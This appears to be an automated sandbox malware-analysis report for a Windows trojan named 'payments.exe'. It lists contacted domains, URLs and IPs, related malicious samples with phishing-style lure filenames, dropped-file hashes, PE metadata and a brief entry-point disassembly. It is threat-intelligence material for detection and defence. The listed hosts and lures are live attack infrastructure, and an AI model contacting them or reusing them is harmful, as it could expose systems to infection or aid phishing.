http://www.matteicapital.online/Interest.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1SZmvSimx | pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff | pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmp | false | - | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | pcaui.exe, 00000004.00000002.3804958379.000000000763E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://i3.cdn-image.com/__media__/pics/28905/arrrow.png) | pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmp | false | - | high
http://www.canadavinreport.site/cvhb/?bBw=eb9ahS5GFYDOhq0JOiIrfnQwKg301mZRXDTXF/EDnGWOAiF9jJHx | pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.000000000611A000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.000000000471A000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix | pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmp | false | - | high
https://www.ecosia.org/newtab/ | pcaui.exe, 00000004.00000002.3804958379.000000000763E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://i3.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg | pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmp | false | - | high
http://www.matteicapital.online/__media__/js/trademark.php?d=matteicapital.online&type=ns | pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ac.ecosia.org/autocomplete?q= | pcaui.exe, 00000004.00000002.3804958379.000000000763E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf | pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmp | false | - | high
http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf | pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmp | false | - | high
http://www.matteicapital.online/Angel_Investors.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1S | pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular | pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmp | false | - | high
http://www.3kw40881107247y.click | XhwUfLdILQipZF.exe, 00000006.00000002.3803049222.00000000056B4000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://i3.cdn-image.com/__media__/js/min.js?v2.3 | pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmp | false | - | high
http://www.Matteicapital.online | pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | pcaui.exe, 00000004.00000002.3804958379.000000000763E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://www.matteicapital.online/__media__/design/underconstructionnotice.php?d=matteicapital.online | pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
Chart legend (IPs per country; image not reproduced): No. of IPs < 25%; 25% < No. of IPs < 50%; 50% < No. of IPs < 75%; 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
209.74.77.109 | www.gogawithme.live | United States | 31744 | MULTIBAND-NEWHOPEUS | false
146.88.233.115 | smartcongress.net | France | 53589 | PLANETHOSTER-8CA | false
8.210.114.150 | www.llljjjiii.shop | Singapore | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | false
104.21.58.90 | www.bser101pp.buzz | United States | 13335 | CLOUDFLARENETUS | false
199.59.243.227 | www.acond-22-mvr.click | United States | 395082 | BODIS-NJUS | false
208.91.197.27 | www.matteicapital.online | Virgin Islands (BRITISH) | 40034 | CONFLUENCE-NETWORK-INCVG | false
104.21.62.184 | www.questmatch.pro | United States | 13335 | CLOUDFLARENETUS | false
38.47.232.124 | 70kdd.top | United States | 174 | COGENT-174US | false
172.67.192.207 | www.3kw40881107247y.click | United States | 13335 | CLOUDFLARENETUS | false
161.97.142.144 | www.54248711.xyz | United States | 51167 | CONTABODE | true
103.21.221.87 | rtpterbaruwaktu3.xyz | unknown | 9905 | LINKNET-ID-APLinknetASNID | true
47.76.213.197 | www.ytsd88.top | United States | 9500 | VODAFONE-TRANSIT-ASVodafoneNZLtdNZ | false
185.27.134.206 | www.canadavinreport.site | United Kingdom | 34119 | WILDCARD-ASWildcardUKLimitedGB | false
194.85.61.76 | www.mrpokrovskii.pro | Russian Federation | 48287 | RU-CENTERRU | false
172.67.209.48 | www.ampsamkok88.shop | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1560289
Start date and time: 2024-11-21 16:19:16 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 36s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Potential for more IOCs and behavior
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: payments.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/3@19/15
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 53
• Number of non-executed functions: 301
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target XhwUfLdILQipZF.exe, PID 6004 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: payments.exe
Time | Type | Description
10:20:56 | API Interceptor | 11868603x Sleep call for process: pcaui.exe modified
                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        209.74.77.109A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.dailyfuns.info/n9b0/
                                                                                                                        199.59.243.227DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.bcg.services/mxde/?KV=8xKxkpsUUE6O2YGNwLnJ/+WM1qqfoI8NOsOkZIrS/NSsfWu+QjWct9+gZKiyGOAYB5Pljgx8M21MT9QArezJJe5Vce6MQIBegnnKKN1EkLTSu1v+eqsUQ+w=&Wno=a0qDq
                                                                                                                        CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.bcg.services/xz45/
                                                                                                                        A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.dating-apps-az-dn5.xyz/pn0u/
                                                                                                                        need quotations.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.bcg.services/5onp/
                                                                                                                        Order No 24.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.migraine-massages.pro/ym43/
                                                                                                                        http://inscrit.es/Get hashmaliciousUnknownBrowse
                                                                                                                        • ww88.inscrit.es/_tr
                                                                                                                        http://inscrit.es/Get hashmaliciousUnknownBrowse
                                                                                                                        • ww88.inscrit.es/_tr
                                                                                                                        BlgAsBdkiD.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.adsdomain-195.click/q3rc/
                                                                                                                        RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.migraine-massages.pro/ym43/
                                                                                                                        statement of accounts.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.vnxoso88.art/d26j/
                                                                                                                        208.91.197.27DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.614genetics.online/me88/?KV=q4gJP+3oagrN9CKx8rfxsUGQTP5gFdbCqSnsSAovlnmOs/6LoBJM5Gt+ZeI5OsVhXMd6KM7YnqTd6M8YysOllc/dqLONIyR3l/1k9rdJVwtuEJXWvL6OrMc=&Wno=a0qDq
                                                                                                                        Order No 24.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.yushaliu.online/fjsq/
                                                                                                                        PO 20495088.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.fedegaritech.online/sxrn/
                                                                                                                        Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.crochetpets.online/5pe6/
                                                                                                                        RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.yushaliu.online/fjsq/
                                                                                                                        DHL SHIPPING CONFIRMATION-SAMPLES DELIVERY ADDRESS.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.fedegaritech.online/c6cn/
                                                                                                                        statement of accounts.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.yushaliu.online/fjsq/
                                                                                                                        Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.rimberiokitchen.online/xvf3/?mRu=WlBP6ZDj33sme071J7YmRt2meznD9lOMeO4smNCsOshEYDb+rkIOBjcGODqfewmlgMUUULEtW3alEv1cIqlE3oXaOj92B6nyIwOIgW4/F45i+leDgRmHhUA=&UJ=7H1XM
                                                                                                                        Selected_Items.vbsGet hashmaliciousFormBookBrowse
                                                                                                                        • www.fedegaritech.online/qiu8/
                                                                                                                        RFQ.docxGet hashmaliciousFormBookBrowse
                                                                                                                        • www.danceonwater.net/bbvc/
                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        www.questmatch.proSWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 188.114.96.3
                                                                                                                        s-part-0035.t-0009.t-msedge.netfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                        • 13.107.246.63
                                                                                                                        S0FTWARE.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                        • 13.107.246.63
                                                                                                                        Rte_PRPay.docxGet hashmaliciousUnknownBrowse
                                                                                                                        • 13.107.246.63
                                                                                                                        https://floreslaherradura.com/?uid=a2FuZGVyc29uQGJxbGF3LmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 13.107.246.63
                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 13.107.246.63
                                                                                                                        Fax-494885 Boswell Automotive Group.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                        • 13.107.246.63
                                                                                                                        Fax-494885 Boswell Automotive Group.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                        • 13.107.246.63
                                                                                                                        Y7Zv23yKfb.exeGet hashmaliciousMicroClipBrowse
                                                                                                                        • 13.107.246.63
                                                                                                                        PNSBt.jsGet hashmaliciousAsyncRATBrowse
                                                                                                                        • 13.107.246.63
                                                                                                                        zc4x7OQkYB.dllGet hashmaliciousUnknownBrowse
                                                                                                                        • 13.107.246.63
                                                                                                                        www.ytsd88.topQuotation request -30112024_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 47.76.213.197
                                                                                                                        www.mrpokrovskii.proItem-RQF-9456786.exeGet hashmaliciousUnknownBrowse
                                                                                                                        • 109.70.26.37
                                                                                                                        www.canadavinreport.siteThermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 185.27.134.206
                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        CLOUDFLARENETUSMandatory Notice for all December Leave and Vacation application.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 104.21.41.74
                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                        • 162.159.61.3
                                                                                                                        http://xmrminingproxy.comGet hashmaliciousUnknownBrowse
                                                                                                                        • 104.21.6.188
                                                                                                                        Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 104.21.66.38
                                                                                                                        VMX.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 172.67.198.61
                                                                                                                        Director of Performance Marketing Job Description Roles & Responsibilities Theory 2024.lnkGet hashmaliciousDucktailBrowse
                                                                                                                        • 104.21.15.40
                                                                                                                        https://spacardportal.works.com/garGet hashmaliciousUnknownBrowse
                                                                                                                        • 104.18.86.42
                                                                                                                        ADZ Laucher.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 172.67.155.248
                                                                                                                        Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 172.67.219.199
                                                                                                                        Director of Performance Marketing Job Description Roles & Responsibilities Theory 2024.lnkGet hashmaliciousDucktailBrowse
                                                                                                                        • 172.67.161.101
                                                                                                                        CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCx86.elfGet hashmaliciousUnknownBrowse
                                                                                                                        • 47.244.139.234
                                                                                                                        Y7Zv23yKfb.exeGet hashmaliciousMicroClipBrowse
                                                                                                                        • 8.210.144.166
                                                                                                                        Y7Zv23yKfb.exeGet hashmaliciousMicroClipBrowse
                                                                                                                        • 8.210.144.166
                                                                                                                        cho_mea64.exeGet hashmaliciousMicroClipBrowse
                                                                                                                        • 8.210.144.166
                                                                                                                        cho_mea64.exeGet hashmaliciousMicroClipBrowse
                                                                                                                        • 8.210.144.166
                                                                                                                        mal.jsGet hashmaliciousUnknownBrowse
                                                                                                                        • 8.209.119.17
                                                                                                                        m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                        • 47.242.96.185
                                                                                                                        DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                                                                        • 47.254.140.255
                                                                                                                        PHA AL PO.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 47.52.221.8
                                                                                                                        mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                        • 47.241.54.126
                                                                                                                        PLANETHOSTER-8CAhttps://texasbarcle.com/CLE/AAGateway.asp?lRefID=19203&sURL=https://famezik.com/#Zi5waWNhc3NvJG1hcmxhdGFua2Vycy5ncg==Get hashmaliciousUnknownBrowse
                                                                                                                        • 146.88.234.239
                                                                                                                        EVCPUSBND147124_MBL Check_revised.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                        • 199.16.129.175
                                                                                                                        Yb6ztdvQaB.elfGet hashmaliciousUnknownBrowse
                                                                                                                        • 85.236.153.44
                                                                                                                        Remittance advice.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                        • 199.16.129.175
                                                                                                                        https://serwer2464839.home.pl/imodzeb4Get hashmaliciousUnknownBrowse
                                                                                                                        • 146.88.233.222
                                                                                                                        3Lf408k9mg.exeGet hashmaliciousPureLog Stealer, SystemBCBrowse
                                                                                                                        • 146.88.232.72
                                                                                                                        https://gsdgroup.ca/Get hashmaliciousUnknownBrowse
                                                                                                                        • 199.16.129.142
                                                                                                                        http://amundsenscience.comGet hashmaliciousUnknownBrowse
                                                                                                                        • 199.59.247.234
                                                                                                                        Hospital_Inquiry_List_3892892921.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                        • 146.88.237.40
                                                                                                                        PO_BCA08727.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                        • 146.88.237.40
                                                                                                                        MULTIBAND-NEWHOPEUSMandatory Notice for all December Leave and Vacation application.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 209.74.77.108
                                                                                                                        http://mt6j71.p1keesoulharmony.com/Get hashmaliciousHTMLPhisher, EvilProxyBrowse
                                                                                                                        • 209.74.95.101
                                                                                                                        CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 209.74.77.108
                                                                                                                        RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 209.74.77.107
                                                                                                                        A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 209.74.77.109
                                                                                                                        https://hmjpvx0wn1.gaimensebb.shop/Get hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                                                                        • 209.74.95.101
                                                                                                                        Order No 24.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 209.74.64.58
                                                                                                                        dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 209.74.64.187
                                                                                                                        RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 209.74.64.58
                                                                                                                        DHL SHIPPING CONFIRMATION-SAMPLES DELIVERY ADDRESS.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 209.74.64.59
Process: C:\Windows\SysWOW64\pcaui.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category: dropped
Size (bytes): 196608
Entropy (8bit): 1.1221538113908904
Encrypted: false
SSDEEP: 192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
MD5: C1AE02DC8BFF5DD65491BF71C0B740A7
SHA1: 6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
SHA-256: CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
SHA-512: 01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
Malicious: false
Reputation: moderate, very likely benign file
Process: C:\Users\user\Desktop\payments.exe
File Type: data
Category: dropped
Size (bytes): 288768
Entropy (8bit): 7.994847236452791
Encrypted: true
SSDEEP: 6144:JseSGRW+iAkgzKiQWWW9oQEMjTpc3FvXwv5I3I5rRJIic3D:JseSGU+iqm5WGQS1vgvG4xR9iD
MD5: CC3B6A14C7B68CCCFAFCAB04B89A29E1
SHA1: 9FA78D008443C7539C5D5B666351DE4A1EDA17CF
SHA-256: A5043E5BB7014021F6E70605B63ED504CFC8AE20F1CF939F02C8193D904EF9D0
SHA-512: 72226B94E52C38423D7CE6317A1ED7511D316E079F1F43AB9DAF4BE0FF405BC1B168A178A7FB33C4B31BD7AD3DFF309BA23A8C8579B3B8EAE0BAAAA7A942797A
Malicious: false
Reputation: low
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.146295107031158
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: payments.exe
File size: 1'213'440 bytes
MD5: 63c1545a3e20b0dc33a010e441943d0f
SHA1: 316d618c16be07f4783045b6e1d9be6cd516915b
SHA256: 8d8c60a5a1bdde82ded1b5c433703d5f4b1063c102df9a5df34e963032cadf73
SHA512: 4556cb51727fd81155028910ac6e1054b5036fdfaec8615ee7263e60d4a225f472e1ac132cb81537a7328a7ea44c56daccad09e685914200a78a495a06a9ca50
SSDEEP: 24576:btb20pkaCqT5TBWgNQ7apH1IicrWkxpdNGlwEaGz56As:YVg5tQ7apVIi2/xUl+c5s
TLSH: 9745CF1373DE8365C3B25273BA25B741AEBF782506B1F56B2FD4093DE920122521EA73
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........
Icon Hash: aaf3e3e3938382a0
Entrypoint: 0x425f74
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x673ECB28 [Thu Nov 21 05:54:48 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 3d95adbf13bbe79dc24dccb401c12091
Instruction
call 00007FEC7470581Fh
jmp 00007FEC746F8834h
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007FEC746F89BAh
cmp edi, eax
jc 00007FEC746F8D1Eh
bt dword ptr [004C0158h], 01h
jnc 00007FEC746F89B9h
rep movsb
jmp 00007FEC746F8CCCh
cmp ecx, 00000080h
jc 00007FEC746F8B84h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007FEC746F89C0h
bt dword ptr [004BA370h], 01h
jc 00007FEC746F8E90h
bt dword ptr [004C0158h], 00000000h
jnc 00007FEC746F8B5Dh
test edi, 00000003h
jne 00007FEC746F8B6Eh
test esi, 00000003h
jne 00007FEC746F8B4Dh
bt edi, 02h
jnc 00007FEC746F89BFh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007FEC746F89C3h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007FEC746F8A15h
bt esi, 03h
jnc 00007FEC746F8A68h
movdqa xmm1, dqword ptr [esi+00h]
Programming Language:
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ASM] VS2012 UPD4 build 61030
• [RES] VS2012 UPD4 build 61030
• [LNK] VS2012 UPD4 build 61030
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb7004 | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc4000 | 0x5f3c4 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x124000 | 0x6c4c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x8d8d0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb2730 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8d000 | 0x860 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8b54f | 0x8b600 | f437a6545e938612764dbb0a314376fc | False | 0.5699499019058296 | data | 6.680413749210956 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8d000 | 0x2cc42 | 0x2ce00 | 827ffd24759e8e420890ecf164be989e | False | 0.330464397632312 | data | 5.770192333189168 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xba000 | 0x9d54 | 0x6200 | e0a519f8e3a35fae0d9c2cfd5a4bacfc | False | 0.16402264030612246 | data | 2.002691099965349 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc4000 | 0x5f3c4 | 0x5f400 | fe3c270a8920a26dfe5ecc9a2167ae68 | False | 0.9315791092519685 | data | 7.901156727761588 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x124000 | 0xa474 | 0xa600 | 0c402851fae387bd974e925866f62ef9 | False | 0.5018119352409639 | data | 5.245632821966595 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc45a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc46d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc47f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc4920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc4c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
